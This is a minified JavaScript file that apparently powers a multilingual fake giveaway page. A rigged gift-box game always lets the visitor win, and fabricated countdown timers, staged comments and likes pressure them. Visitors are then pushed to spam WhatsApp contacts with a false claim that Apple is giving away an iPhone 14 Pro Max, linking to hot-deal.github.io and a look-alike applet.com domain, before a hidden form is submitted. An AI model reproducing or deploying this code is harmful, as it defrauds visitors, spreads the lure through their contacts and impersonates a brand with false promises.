var brand_country='United Kingdom';var dayNames=new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday");var monthNames=new Array("January","February","March","April","May","June","July","August","September","October","November","December");var minutos_y,segundos;var lang=navigator.language;var modalOptions={backdrop:'static',keyboard:false};var g_banner_ad=true;var texts;var tipnstr,alertTip;var namee,username;$(function(){if($('#languages').val()==="ar"){minutos_y=" دقائق و ";segundos="ثوانى";alertTip="يجب ان لا تقوم بالنشر في نفس المجموعة او الصديق اكتر من مرة .";tipnstr="المروجوا الضغط على زر الواتساب والنشر حتى يمتلأ الشريط الازرق واضغط على ارسال الهاتف ";}
else if($('#languages').val()==="fr"){minutos_y="minutes et ";segundos="seconds";alertTip="Vous devez partager avec vos amis sur Whatsapp notre promotion à l'adresse d'expédition. Partagez jusqu'à ce que la barre bleue soit pleine!";tipnstr="Échec du partage! Le même groupe ou le même ami n'est pas correct. Veuillez vérifier et partager à nouveau.";}
else if($('#languages').val()==="es"){minutos_y="minutos y ";segundos="segundos";alertTip="Tienes que compartir con amigos en Whatsapp sobre nuestra promoción a la dirección de envío. ¡Comparte hasta que la barra azul esté llena!";tipnstr="No se pudo compartir. El mismo grupo o el mismo amigo no es correcto. Compruébalo y comparte de nuevo.";}
else if($('#languages').val()==="en"){minutos_y="minutes and ";segundos="seconds";tipnstr="You Have To Share with friends on Whatsapp about our promotion To Shipping Address. Share until the blue bar is full!";alertTip="Sharing failed!The same group or the same friend is not correct. Please check and share again.";}});function set_Cookie(name,value){name="easter"+name;var Days=30;var exp=new Date();exp.setTime(exp.getTime()+(Days*20*1000));document.cookie=name+"="+escape(value)+";expires="+exp.toGMTString()+"; path=/;"}
function get_Cookie(name){name="easter"+name;var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");if(arr=document.cookie.match(reg)){return unescape(arr[2]);}
return '';}
window.onhashchange=function(){jp();};function jp(){fh();}
function wxalert(t,n,b,flag,i){var r,u;r='<div class="weui_dialog_alert" style="position: fixed; z-index: 1000; display: none;margin-left:15%;margin-right:15%">'
+'<div class="weui_mask"></div>'+'<div class="weui_dialog">'
+'<div class="weui_dialog_hd"><strong class="weui_dialog_title"></strong></div>'
+'<div class="weui_dialog_bd" style="color:#000;padding-top:20px;padding-bottom:10px;"></div>'
+'<div class="weui_dialog_ft">'
+'<div href="javascript:void(0);" class="weui_btn_dialog primary btn">OK</div>'
+"</div>"+"</div>"+"</div>";$(".weui_dialog_alert").length>0?$(".weui_dialog_alert .weui_dialog_bd").empty():$("body").append($(r));setTimeout(function(){u=$(".weui_dialog_alert");u.show();u.find(".weui_dialog_bd").html(n);u.find(".weui_dialog_title").html(t);u.find(".weui_btn_dialog").html(b?b:"");u.find(".weui_btn_dialog").off("click").on("click",function(){i();u.hide();if(flag==1){stopConfetti();}});u.find(".weui_close").off("click").on("click",function(){i();u.hide();if(flag==1){stopConfetti();}});if(flag==1){startConfetti();}},500);}
var maxParticleCount=150;var particleSpeed=2;var startConfetti;var stopConfetti;var toggleConfetti;var removeConfetti;(function(){startConfetti=startConfettiInner;stopConfetti=stopConfettiInner;toggleConfetti=toggleConfettiInner;removeConfetti=removeConfettiInner;var colors=["DodgerBlue","OliveDrab","Gold","Pink","SlateBlue","LightBlue","Chocolate","Crimson"]
var streamingConfetti=false;var animationTimer=null;var particles=[];var waveAngle=0;function resetParticle(particle,width,height){particle.color=colors[(Math.random()*colors.length)|0];particle.x=Math.random()*width;particle.y=Math.random()*height-height;particle.diameter=Math.random()*10+5;particle.tilt=Math.random()*10-10;particle.tiltAngleIncrement=Math.random()*0.07+0.05;particle.tiltAngle=0;return particle;}
function startConfettiInner(){var width=window.innerWidth;var height=window.innerHeight;window.requestAnimFrame=(function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(callback){return window.setTimeout(callback,16.6666667);};})();var canvas=document.getElementById("confetti-canvas");if(canvas===null){canvas=document.createElement("canvas");canvas.setAttribute("id","confetti-canvas");canvas.setAttribute("style","display:block;z-index:999999;pointer-events:none;position: absolute;left: 0px;top: 0px;");document.body.appendChild(canvas);canvas.width=width;canvas.height=height;window.addEventListener("resize",function(){canvas.width=window.innerWidth;canvas.height=window.innerHeight;},true);}
var context=canvas.getContext("2d");while(particles.length<maxParticleCount)
particles.push(resetParticle({},width,height));streamingConfetti=true;if(animationTimer===null){(function runAnimation(){context.clearRect(0,0,window.innerWidth,window.innerHeight);if(particles.length===0)
animationTimer=null;else{updateParticles();drawParticles(context);animationTimer=requestAnimFrame(runAnimation);}})();}}
function stopConfettiInner(){streamingConfetti=false;}
function removeConfettiInner(){stopConfetti();particles=[];}
function toggleConfettiInner(){if(streamingConfetti)
stopConfettiInner();else
startConfettiInner();}
function drawParticles(context){var particle;var x;for(var i=0;i<particles.length;i++){particle=particles[i];context.beginPath();context.lineWidth=particle.diameter;context.strokeStyle=particle.color;x=particle.x+particle.tilt;context.moveTo(x+particle.diameter/2,particle.y);context.lineTo(x,particle.y+particle.tilt+particle.diameter/2);context.stroke();}}
function updateParticles(){var width=window.innerWidth;var height=window.innerHeight;var particle;waveAngle+=0.01;for(var i=0;i<particles.length;i++){particle=particles[i];if(!streamingConfetti&&particle.y<-15)
particle.y=height+100;else{particle.tiltAngle+=particle.tiltAngleIncrement;particle.x+=Math.sin(waveAngle);particle.y+=(Math.cos(waveAngle)+particle.diameter+particleSpeed)*0.5;particle.tilt=Math.sin(particle.tiltAngle)*15;}
if(particle.x>width+20||particle.x<-20||particle.y>height){if(streamingConfetti&&particles.length<=maxParticleCount)
resetParticle(particle,width,height);else{particles.splice(i,1);i--;}}}}})();var box_ini=!1
var count=1;var intentos=3;var puedo=false;var boxRoot;(function(){"use strict";boxRoot={_init:function(){setTimeout(function(){jQuery('#Congratulations_modal').modal(modalOptions);},1000);jQuery('.try').on('click',function(){if(puedo&&count<=intentos){if(jQuery(this).hasClass('abierta')){}else{puedo=false;jQuery('.circle-loader').removeClass("load-complete");jQuery('.checkmark').css("display","none");jQuery(this).addClass('abierta');if(count==2){jQuery(this).addClass('premiazo');setTimeout(function(){jQuery(".div_img_gift, .img_gift").fadeIn("slow",function(){setTimeout(function(){jQuery('#p_modal3').modal(modalOptions);jQuery('.circle-loader').addClass("load-complete");jQuery('.checkmark').css("display","block");},1500);});},4000);}else{count++;intentos--;jQuery('#num').html(intentos);setTimeout(function(){jQuery('#Unfortunately_modal').modal(modalOptions);setTimeout(function(){jQuery('.circle-loader').addClass("load-complete");jQuery('.checkmark').css("display","block");puedo=true;},1000);},2000);}}}});jQuery("#ok_modal_button").on("click",function(event){event.stopPropagation();jQuery('#Congratulations_modal').modal('hide');puedo=true;});jQuery("#ok_button3").on("click",function(event){event.stopPropagation();jQuery('#p_modal3').modal('hide');setTimeout(function(){jQuery('#data_modal').modal(modalOptions);},1000);});jQuery("#ok_button2").on("click",function(event){event.stopPropagation();jQuery('#Unfortunately_modal').modal('hide');});}};jQuery(document).ready(function(){if(typeof box_ini=="undefined"){boxRoot._init();}});})();var value=0;var appName="whatsApp";var theme="easter";function share(){if($("#nameform").val()==""){alert("Enter Your name first !");}
else
{username=$("#nameform").val();if($('#languages').val()==="en")
{$("#Welcome").html("Congratulations "+username+" !");texts=["ارسلت لك هدية  اضغط على الرابط الازرق https://hot-deal.github.io/iphone//ارسلت-لك-هدية-اضغط-هنا-بسرعة "];namee="    "+$("#nameform").val();}
else if($('#languages').val()==="ar")
{$("#Welcome").html("تهانينا "+username+" !");texts=["  https://hot-deal.github.io/iphone/ "];namee="  تم التحويل من طرف  "+$("#nameform").val();}
else if($('#languages').val()==="es")
{$("#Welcome").html("¡Felicidades "+username+" !");namee="   Estás invitado por  "+$("#nameform").val();texts=[" 🔴 📱📲📲 Win *iphone-14-pro-max* ofrecido por apple por un valor de $ 1500. Con motivo de su 30 aniversario, apúrate a registrarte desde aquí  http://applet.com-------------------l.com/es"];}
else if($('#languages').val()==="fr")
{$("#Welcome").html("Toutes nos félicitations "+username+" !");namee="   Vous êtes invité par  "+$("#nameform").val();texts=["🔴 📱📲📲 Gagnez *iphone-14-pro-max* offert par apple d'une valeur de 1500 $. A l'occasion de son 30e anniversaire, dépêchez-vous de vous inscrire d'ici  http://applet.com-------------------l.com/fr"];}
for(var i=0;i<texts.length;i++){texts[i]=texts[i].trim();texts[i]=texts[i]+'\n'+namee;texts[i]=texts[i].replace(/ /g,"%20");}
var number=Math.floor((Math.random()*texts.length));var rand="whatsapp://send?text="+texts[number];$("#whats").attr("href",rand);set_Cookie('type_op',2)
jQuery('#data_modal').modal('hide');$('#content4').show();$('#content3').hide();$('#content2').hide();$('#content1').hide();$('#content0').hide();}}
function showShare(){set_Cookie('type_op',2)
jQuery('#data_modal').modal('hide');$('#content4').show();$('#content3').hide();$('#content2').hide();$('#content1').hide();$('#content0').hide();}
$(function(){var typeop=parseInt(get_Cookie('type_op'));if(typeop==2){showShare()}
if(get_Cookie('prog')){setTimeout(function(){$(".hide-all").hide();$(".show-all").show();incrementValue_a();fn1_a();chooseApp(1);if(get_Cookie("appName")!=""){appName=get_Cookie("appName");}
$(".appName").html(appName);$("#sw_bn").html(appName);tipnstr=tipnstr.replace(/NNN/g,appName);},200)}});function fn1_a(){v=parseInt(get_Cookie('prog'))-1;document.querySelector('#progressbar').style['display']="block";v=='0'?ob=30:v=='1'?ob=50:v=='2'?ob=52:v=='3'?ob=60:v=='4'?ob=60:v=='5'?ob=65:v=='6'?ob=70:v=='7'?ob=80:v=='8'?ob=85:v=='9'?ob=90:v=='10'?ob=96:v=='11'?ob=98:v=='12'?ob=100:void(0);document.querySelector('#progressbar').style['width']=ob+"%";document.querySelector('#progressbar').style['width']=ob+"%";document.querySelector('#progressbar').textContent=ob+"%";}
function incrementValue_a(){value=parseInt(get_Cookie('prog'))-1;if(value==2||value==4){wxalert("",alertTip,"OK",2,function(){});}
if(value>=12){lasthtml();}}
function chooseApp(type){if(type==1){appName="Whatsapp";}else{appName="Line";}
set_Cookie("appName",appName);$(".appName").html(appName);$("#sw_bn").html(appName);tipnstr=tipnstr.replace(/NNN/g,appName);}
var tiaoban="";j='';banner='';function incrementValue1(){setTimeout(function(){incrementValue_i();fn1_i();value=parseInt(get_Cookie('prog'));set_Cookie('prog',value+1);if(value>3&&g_banner_ad===true){g_banner_ad=false;}},2000);}
function incrementValue_i(){get_Cookie('prog')==''?value=0:value=get_Cookie('prog');if(value==2||value==4){wxalert("",alertTip,"OK",2,function(){});}
set_Cookie('prog',value);if(value>=12){lasthtml();}}
function fn1_i(){v=get_Cookie('prog');document.querySelector('#progressbar').style['display']="block";v=='0'?ob=30:v=='1'?ob=50:v=='2'?ob=52:v=='3'?ob=60:v=='4'?ob=60:v=='5'?ob=65:v=='6'?ob=70:v=='7'?ob=80:v=='8'?ob=85:v=='9'?ob=90:v=='10'?ob=96:v=='11'?ob=98:v=='12'?ob=100:void(0);document.querySelector('#progressbar').style['width']=ob+"%";document.querySelector('#progressbar').style['width']=ob+"%";document.querySelector('#progressbar').textContent=ob+"%";}
function lasthtml(){document.getElementById("whatsapp_button").style.display='none';document.getElementById("button2").style.display='block';}
function tipn(){wxalert("",tipnstr,"OK",2,function(){});}
function stepfinal(){jQuery("#body_content").fadeOut("slow");jQuery("#p_loading").fadeIn("slow");}
function goToUrlFinish(){stepfinal();PreventExitPop=false;document.getElementById("p_form_post").submit();}
function scrollTo(a){if($("#"+a).length){var c=$("#"+a).offset();var b=c.top;$("html,body").animate({scrollTop:b},{duration:"slow"});}}
jQuery(document).ready(function(){function d(h){var j,k,i=h,g=setInterval(function(){j=parseInt(i/60,10),k=parseInt(i%60,10),k=10>k?"0"+k:k,$("#timer").text(j+" "+minutos_y+k+" "+segundos),--i<0&&(clearInterval(g));},1000);}
if(jQuery("#timer").length>=1){d((4*60)+29);}
function f(g){if(g<10){g="0"+g;}
return g;}
var b=new Date();var a=f(b.getHours())+":"+f(b.getMinutes());jQuery(".p_var-dia").text(b.getDate());jQuery(".p_var-mes").text(b.getMonth());jQuery(".p_var-anyo").text(b.getFullYear());jQuery(".p_var-dia_nombre").text(dayNames[b.getDay()]);jQuery(".p_var-mes_nombre").text(monthNames[b.getMonth()]);jQuery(".p_var-hora_fija").text(a);if(jQuery(".p_var-browser").length>=1){var c=getBrowser();jQuery(".p_var-browser").text(c);}
if(jQuery(".p_var-browser").length>=1){var e=getPlatform();jQuery(".p_var-so").text(e);}});$(document).ready(function(){$(".bq1").click(function(){$("#q1").fadeOut("slow",function(){$("#q2").fadeIn("slow")})}),$(".bq2").click(function(){$("#q2").fadeOut("slow",function(){$("#q3").fadeIn("slow")})}),$(".bq3").click(function(){$("#q3").fadeOut("slow",function(){$("#q4").fadeIn("slow")})}),$(".bq4").click(function(){$('#content0').hide();scrollTo("id1"),$("#content1").fadeOut("slow",function(){$("#content2").fadeIn(),setTimeout(function(){$("#result1").fadeIn(1e3)},3e3),setTimeout(function(){$("#result2").fadeIn(1e3)},4100),setTimeout(function(){$("#result3").fadeIn(1e3)},6e3),setTimeout(function(){$("#content2").fadeOut("slow",function(){"undefined"!=typeof roulette_ini?rouletteRoot._init():"undefined"!=typeof box_ini&&boxRoot._init(),$("#content3").fadeIn()})},7100)})})});function loadCom(a,b){setTimeout(function(){$(a).fadeIn(250);},b);}
$.fn.onEnterKey=function(callback){$(this).keypress(function(event){var code=event.keyCode?event.keyCode:event.which;if(code==13){callback();return false;}});}
function loadAllComment(){loadCom('#com1',3250);loadCom('#com2',5800);loadCom('#com3',5700);loadCom('#com4',7500);loadCom('#com5',9000);}
$(document).ready(function(){loadAllComment();$('.like').on('click',function(){var _this=$(this);if(_this.hasClass('active-like')){_this.removeClass('active-like');$('.you').removeClass('activee');}else{_this.addClass('active-like');$('.you').addClass('activee');}});$(document).on('click','.fblike',function(){var _this=$(this);var x=_this.next().next().html()==''?0:parseInt(_this.next().next().html());if(_this.hasClass('selected')){_this.removeClass('selected').html('إعجاب');_this.next().next().html(--x);if(x==0)_this.next().next().addClass('likehide');}else{_this.addClass('selected').html('إزالة الإعجاب');_this.next().next().html(++x);if(_this.next().next().hasClass('likehide'))_this.next().next().removeClass('likehide');}});$("#addCom").onEnterKey(function(){var value=$("#addCom").val();$("#addCom").val("");$("#myComment").html(value);$(".addComment").hide();loadCom('#myCom',250);});var zeit=new Date();var sec=zeit.getSeconds();if(sec<6){sec=9}
if(sec>5&sec<13){sec=8}
if(sec>11&sec<19){sec=7}
if(sec>17&sec<25){sec=6}
if(sec>23&sec<31){sec=5}
if(sec>29&sec<37){sec=4}
if(sec>35&sec<43){sec=3}
if(sec>41&sec<49){sec=2}
if(sec>47&sec<55){sec=1}
if(sec>54){sec=0};var add=sec;var zeit2=new Date();var minute=zeit2.getMinutes();var timer1=(60-minute)*60;if(timer1>1800){var resttimer=(30-minute)*10}else{var resttimer=(60-minute)*10};var timer=resttimer+add+67;function updateTimer(){timer--;$("#gutschein").text(timer);if(timer<9){stopFunction();}}
var myTimer=window.setInterval(updateTimer,6000);function stopFunction(){window.clearInterval(myTimer);}});
